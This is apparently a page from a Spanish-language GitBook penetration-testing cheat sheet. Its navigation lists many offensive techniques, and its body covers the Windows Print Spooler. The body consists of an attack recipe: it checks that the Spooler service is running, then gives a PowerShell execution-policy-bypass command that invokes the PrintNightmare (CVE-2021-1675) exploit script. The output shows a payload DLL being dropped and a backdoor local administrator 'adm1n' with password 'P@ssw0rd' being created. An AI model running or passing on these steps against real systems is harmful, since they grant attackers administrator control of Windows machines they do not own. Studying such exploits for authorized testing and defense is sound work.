馃悋
CheatSheet
  • Inicio
  • Web Site
    • Subdomain
  • API
    • Recolecci贸n de Informacion
      • Directorios
      • OSINT
      • Enumeracion en Endpoints
    • Busqueda de Vulnerabilidades
      • Validaciones
      • Mal manejo de errores
      • Sesiones
      • IDOR
      • Ataques de Inyecci贸n
      • Exposici贸n de datos sensibles
      • Otras posibles vulnerabilidades
      • Rate Limit
      • Cors
      • Ataques de Cabeceras
      • Prototype Pollution
      • Ataque de deserializaci贸n
      • Ataques JWT
  • Mobile
    • PlayStore to APK
    • Bypass Ofuscacion Xamarin
    • Bypass Flutter
  • Miscelanio
    • SSH
    • Docker
    • DNS
    • Silver Ticket
    • LDAP
    • Shell Command Files (SCF)
    • SPOOLER
    • JuicyPotato
    • TOMCAT
    • Proc Enum
    • Primitives
    • Archivos .crash
    • Nginx
    • FTP
    • Pivoting
    • Web API to Postman
    • Web Sockets
    • OTP
    • FastInfoset
  • Post Explotaci贸n
    • Dump HTTP Credentials
  • Configuraciones Burpsuite
    • BurpCollaborator Server Privado
Powered by GitBook
On this page
  1. Miscelanio

SPOOLER

ToDo: Printers

Last updated 1 year ago

Get-Service -Name Spooler

Status   Name               DisplayName
------   ----               -----------
Running  Spooler            Print Spooler

Ejecutando:

powershell -ep bypass -c 'Import-Module .\CVE-2021-1675.ps1;Invoke-Nightmare'

[+] using default new user: adm1n
[+] using default new password: P@ssw0rd
[+] created payload at C:\Users\tony\AppData\Local\Temp\nightmare.dll
[+] using pDriverPath = "C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_f66d9eed7e835e97\Amd64\mxdwdrv.dll"
[+] added user  as local administrator
[+] deleting payload from C:\Users\tony\AppData\Local\Temp\nightmare.dll
GitHub - calebstewart/CVE-2021-1675: Pure PowerShell implementation of CVE-2021-1675 Print Spooler Local Privilege Escalation (PrintNightmare)GitHub
Logo